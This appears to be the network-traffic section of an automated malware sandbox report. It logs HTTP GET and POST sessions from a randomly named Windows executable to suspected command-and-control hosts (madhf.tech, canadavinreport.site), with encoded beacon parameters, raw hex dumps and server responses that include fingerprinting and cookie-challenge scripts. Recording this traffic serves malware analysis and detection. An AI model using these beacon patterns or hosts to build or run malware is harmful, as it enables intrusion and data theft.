                                                            Data Ascii: sVC8z=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aHCHTj5qcEOvY83Lyjkz1fqrF/PGy4CI/ojAcEw+xvg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNNgEKxQMEWedppRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOpHZ6pOzd7zPWroAm3Y219EVyzxxycqhnmctOoNURxKTLVSn1OtKs4UAePRIv7FA28CVtaAAgicOjT+T5dyCs+uvLwdAlJnFRv0o+K8/tioUSKtoCFZ6sa4++zhY3SZbYDs9LQGrm8Esoq4gI0mF4sIED4DDrGnem14MyBPCXp47F+8I6HD3/D5DXkFlhhWuzTLr1gy8pPWfys1Yoe06guZvO9hfsrMA86P3xtut0+s/RB1MTIgHaQiik1EOknpE0ntrPDn2cCNCdqO4zCjMlM7zQHMfaZ6XrI7LeLBc8uEzTLhEDxYggXJ2OJQcVi3VH5ikIgoOPTFm517j0SYB3v/bBxibkJmKq+7cm/lBT6TKpFWPZXZ3jcmOO/qmK3xmUIlaHWvivG+VThzA449Bdc5WR+fQP9yVYHRV7smQ8StRPXGPcpD3U4CEbHhm4H/YRYgLFcwKIvdggqjqgcrYunRUJCfAAV0V2gsKrj6XS8dhYeS09gEkoR/jjqTYjVxFDVpdM8LWgxENrg/dikgdYCnZEWh08LlSPtSa+n14HQaD1EOmKyJxNaxSKNKRlVhb+wxNtNjIU+opU+ha8++c5SA [TRUNCATED]
                                                            Nov 20, 2024 21:09:36.800163031 CET871INHTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:36 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133376.4844744; expires=Sat, 18-Nov-2034 20:09:36 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                            Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549848103.224.182.242806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:38.215993881 CET367OUTGET /0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.madhf.tech
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:09:39.625582933 CET1236INHTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:39 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133379.4793557; expires=Sat, 18-Nov-2034 20:09:39 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-length: 1502
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 73 56 43 38 7a 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 43 37 62 53 59 47 46 71 72 78 59 64 67 4a 54 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 2b 34 4e 77 49 70 54 6c 71 76 50 57 53 38 53 6c 34 70 35 56 6a 42 39 6a 34 39 4a 43 42 45 68 56 6d 76 52 36 62 69 4a 2f 30 41 61 57 65 67 3d 3d 26 50 50 50 [TRUNCATED]
                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fff
                                                            Nov 20, 2024 21:09:39.625896931 CET538INData Raw: 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d
                                                            Data Ascii: fff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56&fp=-3'>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549864185.27.134.206806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:45.490627050 CET655OUTPOST /g3h7/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.canadavinreport.site
                                                            Origin: http://www.canadavinreport.site
                                                            Referer: http://www.canadavinreport.site/g3h7/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 67 69 52 55 67 66 44 79 71 47 64 6f 59 2b 6b 55 6b 4a 7a 46 34 66 37 32 49 44 54 42 54 6e 76 4b 59 49 46 4a 58 51 3d
                                                            Data Ascii: sVC8z=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSigiRUgfDyqGdoY+kUkJzF4f72IDTBTnvKYIFJXQ=
                                                            Nov 20, 2024 21:09:46.725544930 CET683INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:09:46 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Cache-Control: no-cache
                                                            Content-Encoding: br
                                                            Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 05 8b 90 86 a6 64 e6 af f5 37 45 eb ba 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 f5 49 0f b5 6a 03 fc a4 e2 78 86 49 a6 fd 82 f6 17 10 d4 2d 76 63 a1 7c dd 97 b2 9c 60 e4 2c 22 07 70 ca ab cf ef ca e5 21 c3 22 4a 11 eb e0 20 c8 95 f1 e9 c0 61 49 3b 9c 14 08 fd 43 dc f7 ff 5d 24 9e fc 36 42 07 b8 56 9c fa fc c6 4e 25 4a cd 1a 2d eb fa f9 b9 15 62 7f e9 ef e9 3f 4c e6 4a 5d cf e7 7a 77 e9 c3 37 0d f3 d8 2b 08 71 50 bc 0a 2d f7 be ed 55 88 63 e4 63 15 25 45 ed 3e c3 f7 25 e4 b0 09 21 8a 2f 8e 0a 68 10 25 c5 b0 cb d9 90 d0 ff 78 7b 5a 01 f4 1f 30 14 42 18 2d 1d 97 3a 49 52 97 cb a2 b4 45 26 1a d2 19 21 b9 c9 21 c2 26 e6 b5 2c b3 3c b7 a9 f7 be 2c 6c 26 65 5e 4a 2e 64 2a 4a 61 72 19 4a de 40 f6 71 ee 65 1e f2 90 6a 1f 72 e3 32 29 84 77 3c 09 21 e4 3c 49 43 b0 2d ae dc c4 4e 1b 5d 01 4c 29 f8 fb bb f4 8b a5 82 31 d2 90 c0 ce 5f df 7f 50 e7 ed 7c 37 5d 46 16 a7 58 63 83 50 0c 2b c0 cc 0f 55 bb [TRUNCATED]
                                                            Data Ascii: 1b98 rrd7EsNtYr'\usxMk $0IjxI-vc|`,"p!"J aI;C]$6BVN%J-b?LJ]zw7+qP-Ucc%E>%!/h%x{Z0B-:IRE&!!&,<,l&e^J.d*JarJ@qejr2)w<!<IC-N]L)1_P|7]FXcP+U K$k4k<+@q`>W)OQ~:Y.{*./vBW}=L6B*+)mQZL84S0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549872185.27.134.206806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:48.157494068 CET675OUTPOST /g3h7/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.canadavinreport.site
                                                            Origin: http://www.canadavinreport.site
                                                            Referer: http://www.canadavinreport.site/g3h7/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 7a 44 6d 62 4c 6b 51 6a 47 47 51 37 59 31 58 41 48 48 36 77 79 32 4c 6f 39 6f 75 35 47 6c 42 49 53 42 6f 32 56 4a
                                                            Data Ascii: sVC8z=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWYzDmbLkQjGGQ7Y1XAHH6wy2Lo9ou5GlBISBo2VJ
                                                            Nov 20, 2024 21:09:49.441334963 CET683INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:09:49 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Cache-Control: no-cache
                                                            Content-Encoding: br
                                                            Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 05 8b 90 86 a6 64 e6 af f5 37 45 eb ba 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 f5 49 0f b5 6a 03 fc a4 e2 78 86 49 a6 fd 82 f6 17 10 d4 2d 76 63 a1 7c dd 97 b2 9c 60 e4 2c 22 07 70 ca ab cf ef ca e5 21 c3 22 4a 11 eb e0 20 c8 95 f1 e9 c0 61 49 3b 9c 14 08 fd 43 dc f7 ff 5d 24 9e fc 36 42 07 b8 56 9c fa fc c6 4e 25 4a cd 1a 2d eb fa f9 b9 15 62 7f e9 ef e9 3f 4c e6 4a 5d cf e7 7a 77 e9 c3 37 0d f3 d8 2b 08 71 50 bc 0a 2d f7 be ed 55 88 63 e4 63 15 25 45 ed 3e c3 f7 25 e4 b0 09 21 8a 2f 8e 0a 68 10 25 c5 b0 cb d9 90 d0 ff 78 7b 5a 01 f4 1f 30 14 42 18 2d 1d 97 3a 49 52 97 cb a2 b4 45 26 1a d2 19 21 b9 c9 21 c2 26 e6 b5 2c b3 3c b7 a9 f7 be 2c 6c 26 65 5e 4a 2e 64 2a 4a 61 72 19 4a de 40 f6 71 ee 65 1e f2 90 6a 1f 72 e3 32 29 84 77 3c 09 21 e4 3c 49 43 b0 2d ae dc c4 4e 1b 5d 01 4c 29 f8 fb bb f4 8b a5 82 31 d2 90 c0 ce 5f df 7f 50 e7 ed 7c 37 5d 46 16 a7 58 63 83 50 0c 2b c0 cc 0f 55 bb [TRUNCATED]
                                                            Data Ascii: 1b98 rrd7EsNtYr'\usxMk $0IjxI-vc|`,"p!"J aI;C]$6BVN%J-b?LJ]zw7+qP-Ucc%E>%!/h%x{Z0B-:IRE&!!&,<,l&e^J.d*JarJ@qejr2)w<!<IC-N]L)1_P|7]FXcP+U K$k4k<+@q`>W)OQ~:Y.{*./vBW}=L6B*+)mQZL84S0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549878185.27.134.206806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:50.828082085 CET1692OUTPOST /g3h7/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.canadavinreport.site
                                                            Origin: http://www.canadavinreport.site
                                                            Referer: http://www.canadavinreport.site/g3h7/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 53 44 71 50 53 33 63 31 73 41 43 6f 72 5a 6b 34 62 2b 50 46 36 71 56 61 45 66 55 42 76 61 2b 42 4b 68 4d 66 56 51 6a 35 48 72 61 35 53 41 6a 69 35 41 7a 72 32 6b 55 66 65 4e 57 52 57 48 59 63 6a 67 58 75 79 74 73 36 52 52 56 72 73 70 63 2f 31 6d 53 44 48 66 59 64 75 6b 6c 76 65 53 50 61 62 39 7a 71 45 79 54 62 59 67 46 44 37 6f 6a 43 79 55 4b 47 5a 72 35 38 54 38 66 73 51 36 4b 32 6d 61 6c 68 34 78 38 6a 2f 64 62 2f 45 4f 51 44 4f 4e 54 79 43 36 66 70 44 79 57 63 74 65 63 63 47 57 [TRUNCATED]
                                                            Data Ascii: sVC8z=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbSDqPS3c1sACorZk4b+PF6qVaEfUBva+BKhMfVQj5Hra5SAji5Azr2kUfeNWRWHYcjgXuyts6RRVrspc/1mSDHfYduklveSPab9zqEyTbYgFD7ojCyUKGZr58T8fsQ6K2malh4x8j/db/EOQDONTyC6fpDyWcteccGWLn99W6SQBuSXYcuxX40SaoH7rO+y2iOCnrRdWE+QxftWDhP/wF/ntsztKSbHDyRd5JqSD1ShNm1YYXQjbhPclz0HqBaCnmskGG1QpxYDiM2GPnELjp1YgVJ8swGzS0XpZs3CEq5NLkDp+wyXJWyeVStM7PHxnqpoMHhJ0GL1h+GNFTIGs0aq0Mgavd23939+wGTu7w/b675lszzPvmcrf7T3NFVcNzgxYEpW8dgLx3m4PiO+ajyoER2I6qpwVeLcVohdnQK7TSnLlmUWq8A7TCdkhQ7x7CsMVOfj2TzhgK3XzjuLU9kMvHE/B3HSDi83SholwdZC6+fR9K0sdrSieoAjNZjkCotUwlH4AmZetNXgRi7I2+FZADNboy49N4+iSteFVW2rO3K6VTlecRnDYaCan0sMUKhY0vqtU1eGphZdoNhqpForns1qFKSPcy4LToIAVkNMyn4ZwoO7VEd2xXj1Cd7VAsKiHjHqBbXT/TRel/lGI7p2qqoUTEKdkRB+dvXuP+qYBorr2UJcJjbrG+lUA3ztr2kruUgPwCnauTtP56oclxsXzqLD2n+QVSQr3BNVgayuP9lpekxT/NXI5kq0wppxCuxYb2776VjkNXEpELT9ceQRUr9Xk0NvvyYP+0//4HGnN6zyOpPGnOJ3cGfRKmd12L5YW6 [TRUNCATED]
                                                            Nov 20, 2024 21:09:52.156817913 CET683INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:09:51 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Cache-Control: no-cache
                                                            Content-Encoding: br
                                                            Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 05 8b 90 86 a6 64 e6 af f5 37 45 eb ba 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 f5 49 0f b5 6a 03 fc a4 e2 78 86 49 a6 fd 82 f6 17 10 d4 2d 76 63 a1 7c dd 97 b2 9c 60 e4 2c 22 07 70 ca ab cf ef ca e5 21 c3 22 4a 11 eb e0 20 c8 95 f1 e9 c0 61 49 3b 9c 14 08 fd 43 dc f7 ff 5d 24 9e fc 36 42 07 b8 56 9c fa fc c6 4e 25 4a cd 1a 2d eb fa f9 b9 15 62 7f e9 ef e9 3f 4c e6 4a 5d cf e7 7a 77 e9 c3 37 0d f3 d8 2b 08 71 50 bc 0a 2d f7 be ed 55 88 63 e4 63 15 25 45 ed 3e c3 f7 25 e4 b0 09 21 8a 2f 8e 0a 68 10 25 c5 b0 cb d9 90 d0 ff 78 7b 5a 01 f4 1f 30 14 42 18 2d 1d 97 3a 49 52 97 cb a2 b4 45 26 1a d2 19 21 b9 c9 21 c2 26 e6 b5 2c b3 3c b7 a9 f7 be 2c 6c 26 65 5e 4a 2e 64 2a 4a 61 72 19 4a de 40 f6 71 ee 65 1e f2 90 6a 1f 72 e3 32 29 84 77 3c 09 21 e4 3c 49 43 b0 2d ae dc c4 4e 1b 5d 01 4c 29 f8 fb bb f4 8b a5 82 31 d2 90 c0 ce 5f df 7f 50 e7 ed 7c 37 5d 46 16 a7 58 63 83 50 0c 2b c0 cc 0f 55 bb [TRUNCATED]
                                                            Data Ascii: 1b98 rrd7EsNtYr'\usxMk $0IjxI-vc|`,"p!"J aI;C]$6BVN%J-b?LJ]zw7+qP-Ucc%E>%!/h%x{Z0B-:IRE&!!&,<,l&e^J.d*JarJ@qejr2)w<!<IC-N]L)1_P|7]FXcP+U K$k4k<+@q`>W)OQ~:Y.{*./vBW}=L6B*+)mQZL84S0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549882185.27.134.206806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:53.479079008 CET377OUTGET /g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.canadavinreport.site
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:09:54.725383997 CET1191INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:09:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 990
                                                            Connection: close
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Cache-Control: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                            Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("4e94f4f2aef4bd3955ed01fff4012ffc");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
